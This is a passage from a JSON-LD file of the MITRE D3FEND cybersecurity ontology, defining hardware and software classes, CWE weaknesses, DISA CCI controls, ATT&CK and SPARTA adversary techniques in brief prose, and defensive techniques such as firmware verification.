      "d3f:definition": "An output device is any piece of computer hardware equipment which converts information into human-readable form. It can be text, graphics, tactile, audio, and video. Some of the output devices are Visual Display Units (VDU) i.e. a Monitor, Printer, Graphic Output devices, Plotters, Speakers etc. A new type of Output device is been developed these days, known as Speech synthesizer, a mechanism attached to the computer which produces verbal output sounding almost like human speeches.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Output_device"
      },
      "rdfs:label": "Output Device",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Scheduling",
      "@type": "owl:Class",
      "rdfs:label": "Scheduling",
      "rdfs:subClassOf": {
        "@id": "d3f:Planning"
      }
    },
    {
      "@id": "d3f:Reference-SimultaneousLoginsOnAHost_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-008/"
      },
      "d3f:kb-abstract": "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.\n\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista. Logon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft's Audit Logon Events page.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationEventThresholding"
      },
      "d3f:kb-reference-title": "CAR-2013-02-008: Simultaneous Logins on a Host",
      "rdfs:label": "Reference - CAR-2013-02-008: Simultaneous Logins on a Host - MITRE"
    },
    {
      "@id": "d3f:Reference-Hardware-assistedSystemAndMethodForDetectingAndAnalyzingSystemCallsMadeToAnOpertingSystemKernel_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180032728A1/en?oq=US20180032728-A1"
      },
      "d3f:kb-abstract": "The present disclosure relates to a system and method for monitoring system calls to an operating system kernel. A performance monitoring unit is used to monitor system calls and to gather information about each system call. The information is gathered upon interrupting the system call and can include system call type, parameters, and information about the calling thread/process, in order to determine whether the system call was generated by malicious software code. Potentially malicious software code is nullified by a malicious code counter-attack module.",
      "d3f:kb-author": "Matthew D. Spisak",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring system calls to detect malicious software code. A system call monitoring module operates at the kernel level and traps system calls.\nMonitoring data includes:\n\n* information about the path to the file to be accessed by a system call.\n* the memory address or range of addresses to be accessed by a system call.\n* the context for the thread within operating system that will be interrupted by a system call.\n* the type of system call information about the socket that is being used by system call in order to send or receive data.\n* the history of system calls in order to monitor for specific sequences of system calls.\n* the frequency or periodicity of a particular system call or set of systems calls.\n\nCaptured system call data is analyzed using data analysis algorithms such as machine learning algorithms, artificial intelligence algorithms, pattern recognition algorithms, or other known data analysis techniques. An alert is generated if it is likely that the system call was generated by malicious software code.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel",
      "rdfs:label": "Reference - Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel - Endgame Inc"
    },
    {
      "@id": "d3f:CCI-000037_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements separation of duties through assigned information system access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000037"
    },
    {
      "@id": "d3f:T1070.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.002",
      "d3f:definition": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemLogFile"
      },
      "rdfs:label": "Clear Linux or Mac System Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:Nc48379296b9541feb57b6f60e4b919f7"
        }
      ]
    },
    {
      "@id": "_:Nc48379296b9541feb57b6f60e4b919f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemLogFile"
      }
    },
    {
      "@id": "d3f:REC-0001.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.04",
      "d3f:definition": "Bus intelligence focuses on which protocols are used (e.g., MIL-STD-1553, SpaceWire, etc.), controller roles, addressing, timings, arbitration, redundancy management, and the location of critical endpoints on each segment. Knowing the bus controller, remote terminal addresses, message identifiers, and schedule tables allows an adversary to craft frames that collide with or supersede legitimate traffic, to starve health monitoring, or to trigger latent behaviors in payload or power systems. Additional details such as line voltages, termination, connector types, harness pinouts, and EMC constraints inform feasibility of injection and disruption techniques. Attackers assemble this picture from ICDs, vendor datasheets, AIT procedures, harness drawings, lab photos, and academic or trade publications that reveal typical configurations. Enumeration of bridges and gateways is especially valuable because they concentrate trust across fault-containment regions and between payload and bus.",
      "rdfs:label": "Data Bus - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Data Bus"
    },
    {
      "@id": "d3f:CWE-549",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-549",
      "d3f:definition": "The product does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords.",
      "rdfs:label": "Missing Password Field Masking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:CWE-347",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-347",
      "d3f:definition": "The product does not verify, or incorrectly verifies, the cryptographic signature for data.",
      "rdfs:label": "Improper Verification of Cryptographic Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:OTModifyControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "OT command that adds, removes, or changes, process data on a remote device.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Modify Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommand"
        },
        {
          "@id": "_:Ndea9dc21123c48f596187f0fbeba1853"
        }
      ]
    },
    {
      "@id": "_:Ndea9dc21123c48f596187f0fbeba1853",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-002361_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically terminates a user session after organization-defined conditions or trigger events requiring session disconnect.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002361"
    },
    {
      "@id": "d3f:T0894",
      "@type": "owl:Class",
      "d3f:attack-id": "T0894",
      "d3f:definition": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split)",
      "rdfs:label": "System Binary Proxy Execution - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "System Binary Proxy Execution"
    },
    {
      "@id": "d3f:DataAcquisitionAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software component which connects to data sources to gather raw, time-stamped data. It often connects to databases or historian gateways for storage and analysis.",
      "d3f:synonym": "Data Gateway; Historian Collector",
      "rdfs:label": "Data Acquisition Agent",
      "rdfs:seeAlso": {
        "@id": "https://attack.mitre.org/assets/A0009"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:T1051",
      "@type": "owl:Class",
      "d3f:attack-id": "T1051",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Shared Webroot",
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:MemoryWord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A memory word is the natural unit of data used by a particular computer processor design; a fixed-size piece of data handled as a unit by the instruction set or the hardware of the processor.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Word_(computer_architecture)"
      },
      "rdfs:label": "Memory Word",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:CWE-560",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-560",
      "d3f:definition": "The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod().",
      "rdfs:label": "Use of umask() with chmod-style Argument",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-687"
      }
    },
    {
      "@id": "d3f:T1651",
      "@type": "owl:Class",
      "d3f:attack-id": "T1651",
      "d3f:definition": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)",
      "rdfs:label": "Cloud Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:FirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-FV",
      "d3f:definition": "Cryptographically verifying firmware integrity.",
      "d3f:kb-article": "## How it works\nCryptographic hash values are computed for system and peripheral firmware. The hash values are compared against precomputed hash values for the identified firmware. A hash value mismatch may indicate that the firmware may have been tampered with or updated with a non-current release indicating a misconfiguration for the system.\n\n## Considerations\n* Requires cryptographically computed hash values of firmware\n* Requires storage of precomputed firmware hash values",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-FirmwareVerificationTrapezoid"
        },
        {
          "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N6d380e3c918c4c79be8bba5676ca47fa"
        }
      ]
    },
    {
      "@id": "_:N6d380e3c918c4c79be8bba5676ca47fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:HardwareComponentInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HardwareComponentInventory"
      ],
      "d3f:d3fend-id": "D3-HCI",
      "d3f:definition": "Hardware component inventorying identifies and records the hardware items in the organization's architecture.",
      "d3f:inventories": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:kb-article": "## How it works\nAdministrators collect information on hardware devices such as peripherals, NICs, processors, and memory devices that are components of the computers in their architecture using a variety of administrative and management tools that query for this information.  In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through remote adminstration tools and system commands, either manually or using scripts.\n\n## Considerations\n* Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.\n* An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools\n\n## Examples\n* Bus discovery\n   * Admin-scripted PCI Bus inventory using ssh and pciutils\n* Application-layer discovery\n   * Simple Network Management Protocol (SNMP) collects MIB information\n   * Web-based Enterprise Management (WBEM) collects CIM information\n      * Windows Management Instrumentation (WMI)\n      * Windows Management Infrastructure (MI)",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AdvancedDeviceMatchingSystem"
      },
      "d3f:synonym": [
        "Hardware Component Discovery",
        "Hardware Component Inventorying"
      ],
      "rdfs:label": "Hardware Component Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:Naf7757edbec943d78848196d16f9a2d1"
        }
      ]
    },
    {
      "@id": "_:Naf7757edbec943d78848196d16f9a2d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-1333",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1333",
      "d3f:definition": "The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.",
      "d3f:synonym": [
        "Catastrophic backtracking",
        "ReDoS",
        "Regular Expression Denial of Service"
      ],
      "rdfs:label": "Inefficient Regular Expression Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-407"
      }
    },
    {
      "@id": "d3f:Shim",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer programming, a shim is a small library that transparently intercepts API calls and changes the arguments passed, handles the operation itself, or redirects the operation elsewhere. Shims can be used to support an old API in a newer environment, or a new API in an older environment. Shims can also be used for running programs on different software platforms than those for which they were developed.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Shim_(computing)"
      },
      "rdfs:label": "Shim",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:KernelModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A loadable kernel module (LKM) is an object file that contains code to extend the running kernel, or so-called base kernel, of an operating system. LKMs are typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls. When the functionality provided by a LKM is no longer required, it can be unloaded in order to free memory and other resources.\n\nMost current Unix-like systems and Microsoft Windows support loadable kernel modules, although they might use a different name for them, such as kernel loadable module (kld) in FreeBSD, kernel extension (kext) in macOS,[1] kernel extension module in AIX, kernel-mode driver in Windows NT[2] and downloadable kernel module (DKM) in VxWorks. They are also known as kernel loadable modules (or KLM), and simply as kernel modules (KMOD).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Loadable_kernel_module"
      },
      "rdfs:label": "Kernel Module",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/kernel_driver"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ObjectFile"
      },
      "skos:altLabel": [
        "LKM",
        "Loadable Kernel Module"
      ]
    },
    {
      "@id": "d3f:TrustedUserAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A trusted attacker who abuses regular user-level access privileges to compromise systems or data.",
      "rdfs:label": "Trusted User Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustedAttacker"
        },
        {
          "@id": "_:Nef54cfed857948a4b40e0374daf59c60"
        },
        {
          "@id": "_:N69c01c3b080e4871b4fb20e950843d3a"
        },
        {
          "@id": "_:Nfb2216c5cd5d49ac846d993d2e59101d"
        }
      ]
    },
    {
      "@id": "_:Nef54cfed857948a4b40e0374daf59c60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefaultUserAccount"
      }
    },
    {
      "@id": "_:N69c01c3b080e4871b4fb20e950843d3a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "_:Nfb2216c5cd5d49ac846d993d2e59101d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T1137.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.001",
      "d3f:definition": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)",
      "d3f:may-add": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-modify": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        }
      ],
      "rdfs:label": "Office Template Macros",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Ncea8479394384d349ef6ca68c7a938e8"
        },
        {
          "@id": "_:N0a6819a60c6b467d9fbeba431e0d043d"
        },
        {
          "@id": "_:Nd2ba6f71c1f747b2ad1dac1b3fcfcb9a"
        }
      ]
    },
    {
      "@id": "_:Ncea8479394384d349ef6ca68c7a938e8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N0a6819a60c6b467d9fbeba431e0d043d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Nd2ba6f71c1f747b2ad1dac1b3fcfcb9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-53",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-53",
      "d3f:definition": "The product accepts path input in the form of multiple internal backslash ('\\multiple\\trailing\\\\slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '\\multiple\\\\internal\\backslash'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-165"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:T1564",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564",
      "d3f:definition": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)",
      "rdfs:label": "Hide Artifacts",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Storage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Computer data storage, often called storage or memory, is a technology consisting of computer components and recording media used to retain digital data. It is a core function and fundamental component of computers. In the Von Neumann architecture, the CPU consists of two main parts: The control unit and the arithmetic / logic unit (ALU). The former controls the flow of data between the CPU and memory, while the latter performs arithmetic and logical operations on data.",
      "d3f:may-contain": {
        "@id": "d3f:FileSystem"
      },
      "d3f:synonym": [
        "Computer data storage",
        "Memory"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_data_storage"
      },
      "rdfs:label": "Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N59e4ce305ec741a09cc1631bb5d9a96c"
        }
      ]
    },
    {
      "@id": "_:N59e4ce305ec741a09cc1631bb5d9a96c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystem"
      }
    },
    {
      "@id": "d3f:EndpointSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A sensor application installed on an endpoint (platform) to collect information on platform components.",
      "rdfs:label": "Endpoint Sensor",
      "rdfs:seeAlso": {
        "@id": "d3f:ComputerPlatform"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CyberSensor"
      }
    },
    {
      "@id": "d3f:T1102",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1102",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Web Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N755ad6b10d7e42d89eb83073f5aa3335"
        }
      ]
    },
    {
      "@id": "_:N755ad6b10d7e42d89eb83073f5aa3335",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-59",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-59",
      "d3f:definition": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.",
      "d3f:synonym": [
        "Zip Slip",
        "insecure temporary file"
      ],
      "rdfs:label": "Improper Link Resolution Before File Access ('Link Following')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:produces",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x produces y: The subject entity x or process produces a data object y, which may be a discrete digital object or a stream (e.g., network traffic).",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01625832-v"
      },
      "rdfs:label": "produces",
      "rdfs:seeAlso": {
        "@id": "d3f:creates"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-produce"
        }
      ],
      "skos:altLabel": "outputs"
    },
    {
      "@id": "d3f:CCI-001855_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a warning to organization-defined personnel, roles, and/or locations within an organization-defined time period when allocated audit record storage volume reaches an organization-defined percentage of repository maximum audit record storage capacity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-14T00:00:00"
      },
      "rdfs:label": "CCI-001855"
    },
    {
      "@id": "d3f:CWE-333",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-333",
      "d3f:definition": "True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block.",
      "rdfs:label": "Improper Handling of Insufficient Entropy in TRNG",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-331"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1357",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1357",
      "d3f:definition": "The product is built from multiple separate components, but it uses a component that is not sufficiently trusted to meet expectations for security, reliability, updateability, and maintainability.",
      "rdfs:label": "Reliance on Insufficiently Trustworthy Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-187",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-187",
      "d3f:definition": "The product performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses.",
      "rdfs:label": "Partial String Comparison",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:ScheduledJobDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the removal of a scheduled task from the system, terminating its execution schedule.",
      "rdfs:label": "Scheduled Job Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N591ca7fb19ee4e319913028c2e581e76"
        }
      ]
    },
    {
      "@id": "_:N591ca7fb19ee4e319913028c2e581e76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:Host",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Application"
      },
      "d3f:definition": "A host is a computer or other device, typically connected to a computer network. A network host may offer information resources, services, and applications to users or other nodes on the network. A network host is a network node that is assigned a network layer host address. Network hosts that participate in applications that use the client-server model of computing, are classified as server or client systems. Network hosts may also function as nodes in peer-to-peer applications, in which all nodes share and consume resources in an equipotent manner.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Host_(network)"
      },
      "rdfs:label": "Host",
      "rdfs:seeAlso": [
        {
          "@id": "https://schema.ocsf.io/objects/device"
        },
        {
          "@id": "https://schema.ocsf.io/objects/endpoint"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "_:N6f411775a8964c86aedf76bf4bb3b344"
        }
      ],
      "skos:altLabel": "Network Host"
    },
    {
      "@id": "_:N6f411775a8964c86aedf76bf4bb3b344",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-001/"
      },
      "d3f:kb-abstract": "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.\n\nMonitoring SMB write requests still creates some noise, particularly with named pipes. As a result, SMB is now split between writing named pipes and writing other files.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:IPCTrafficAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2014-03-001: SMB Write Request - NamedPipes",
      "rdfs:label": "Reference - CAR-2014-03-001: SMB Write Request - NamedPipes - MITRE"
    },
    {
      "@id": "d3f:CWE-370",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-370",
      "d3f:definition": "The product does not check the revocation status of a certificate after its initial revocation check, which can cause the product to perform privileged actions even after the certificate is revoked at a later time.",
      "rdfs:label": "Missing Check for Certificate Revocation after Initial Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-299"
      }
    },
    {
      "@id": "d3f:CWE-1321",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1321",
      "d3f:definition": "The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.",
      "rdfs:label": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-915"
      }
    },
    {
      "@id": "d3f:CWE-1256",
